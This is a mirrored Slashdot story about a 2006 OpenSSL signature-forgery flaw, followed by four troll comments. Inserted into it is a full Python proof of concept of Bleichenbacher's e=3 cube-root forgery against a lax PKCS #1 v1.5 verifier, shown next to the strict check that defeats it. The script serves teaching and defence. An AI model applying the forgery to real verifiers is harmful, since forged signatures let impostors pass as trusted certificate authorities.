Slashdot Mirror


OpenSSL Hit by Forgery Bug

Daniel Cray writes to tell us ZDNet is reporting that OpenSSL versions up to 0.9.7j and 0.9.8b are vulnerable to a signature forgery technique. OpenSSL has already released an update fixing the problem. From the article: "The flaw only affects a particular type of signature — PKCS #1 v1.5 signatures — but these are used by some certificate authorities... The signature forgery technique was first demonstrated last month at the Crypto 2006 conference by Daniel Bleichenbacher, a cryptographer with Bell Labs, according to security firm Netcraft. OpenSSL credited Google Security with successfully forging various certificates and providing the fix."
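The bug class behind this story is easy to reproduce end to end. A PKCS #1 v1.5 signature is the RSA-decryption of a block `00 01 FF..FF 00 || DigestInfo || hash`. A verifier that walks that block with a parser and never checks that the DigestInfo consumed the whole block is open to Bleichenbacher's trick when the public exponent is 3: the attacker writes the legal-looking prefix, fills the rest with zeros, takes the integer cube root, and rounds up. The cube of that root still starts with the prefix (the rounding error only disturbs the low bits, which the verifier ignores) and is smaller than the modulus, so no private key is involved at all. The script below is an added example, not OpenSSL's code or the code referenced in the article; the 2048-bit key, the SHA-256 DigestInfo prefix, the sample message and all function names are assumptions made for illustration. `verify_lax` models the class of bug described; `verify_strict` is the RFC 8017 comparison that defeats it.

```python
"""Bleichenbacher-style e=3 forgery against a lax PKCS#1 v1.5 verifier.

Added example; not code from the Slashdot story, ZDNet, or OpenSSL.
The key is generated on the fly, the message is a constructed sample,
and the function names are ours.
"""
import hashlib
import secrets

# DER prefix of DigestInfo for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def iroot3(x: int) -> int:
    """Floor of the integer cube root (Newton iteration on big ints)."""
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + 2) // 3)      # start above the root
    while True:
        nxt = (2 * r + x // (r * r)) // 3
        if nxt >= r:
            return r
        r = nxt


def is_probable_prime(n: int, rounds: int = 20) -> bool:
    """Miller-Rabin after trial division by small primes."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime_for_e3(bits: int) -> int:
    """Random prime p with p % 3 == 2, so gcd(3, p - 1) == 1 and e=3 is usable."""
    while True:
        p = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if p % 3 == 2 and is_probable_prime(p):
            return p


def keygen(bits: int = 2048):
    """Toy RSA key with e=3 (demonstration only; use a real library in practice)."""
    p, q = gen_prime_for_e3(bits // 2), gen_prime_for_e3(bits // 2)
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))


def emsa_pkcs1_v15(msg: bytes, k: int) -> bytes:
    """EMSA-PKCS1-v1_5 encoding of a k-byte block for SHA-256."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(msg: bytes, n: int, d: int) -> bytes:
    k = (n.bit_length() + 7) // 8
    m = int.from_bytes(emsa_pkcs1_v15(msg, k), "big")
    return pow(m, d, n).to_bytes(k, "big")


def _recover(sig: bytes, n: int, e: int) -> bytes:
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")


def verify_lax(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    """Buggy verifier: parses padding and DigestInfo, ignores what follows."""
    em = _recover(sig, n, e)
    if em[:2] != b"\x00\x01":
        return False
    i = em.find(b"\x00", 2)
    if i < 10 or any(b != 0xFF for b in em[2:i]):   # need >= 8 bytes of 0xFF
        return False
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t             # BUG: em[i+1+len(t):] unchecked


def verify_strict(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    """Correct verifier: the whole encoded block must match (RFC 8017, 8.2.2)."""
    em = _recover(sig, n, e)
    return secrets.compare_digest(em, emsa_pkcs1_v15(msg, len(em)))


def forge(msg: bytes, n: int) -> bytes:
    """Attacker knows only (n, e=3). Shortest legal prefix, zeros, ceil cube root."""
    k = (n.bit_length() + 7) // 8
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    s = iroot3(target)
    if s ** 3 < target:
        s += 1
    # s^3 - target < 3*s^2, far below 2^(8*(k-len(prefix))): prefix survives,
    # and s^3 < n, so the verifier sees s^3 itself with no reduction mod n.
    assert (s ** 3).to_bytes(k, "big").startswith(prefix)
    return s.to_bytes(k, "big")


def demo() -> dict:
    n, e, d = keygen()
    msg = b"CN=example-ca (constructed sample message)"
    genuine, forged = sign(msg, n, d), forge(msg, n)
    return {
        "genuine_lax": verify_lax(msg, genuine, n, e),
        "genuine_strict": verify_strict(msg, genuine, n, e),
        "forged_lax": verify_lax(msg, forged, n, e),
        "forged_strict": verify_strict(msg, forged, n, e),
    }


if __name__ == "__main__":
    print(demo())
```

The forgery needs room for the rounding error of the cube root, which is roughly two thirds the size of the modulus; that is why it works here against a 2048-bit key with SHA-256 but is harder against a 1024-bit key. The fix is not to parse at all: re-encode the expected block from the message and compare it byte for byte against what the public key recovers.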

4 of 69 comments

  1. fuck a c0m by Anonymous Coward · · Score: -1, Troll

    and the striking is the worst off vary for different Keep unnecessary fanatic known

  2. Re:Google saves the day... by AmberBlackCat · · Score: 0, Troll

    Mindlessly attacking Windows doesn't make this flaw go away in the open source software, just as saying something bad about China doesn't make the United States the land of the free or the home of the brave. Replying to this message with some inaccurate claim about Windows having a thousand new bugs every day won't make it go away either.

  3. SSL is overrated by YGingras · · Score: -1, Troll

    You can't apply a technological solution to a social problem. Resellers will sell certs to anyone and no one even bothers to have their certs signed anymore. Even my uni doesn't have a signed cert. You see messages like "if your browser says that the certificate authority isn't known, just click accept" and people just do that. Does anyone even understand what that message means? I mean anyone not in CS, and even then I'm not sure that most people grasp how the trust is supposed to go from Verisign down to your browser. Frankly I don't see what SSL _can_ protect. Unless anyone can understand how it works, the passing of certificates is doomed to be useless.

  4. Netcraft confirms it... by Brando_Calrisean · · Score: 0, Troll

    ... OpenSSH is dead

    --
    Don't call me a cowboy, and don't tell me to slow down!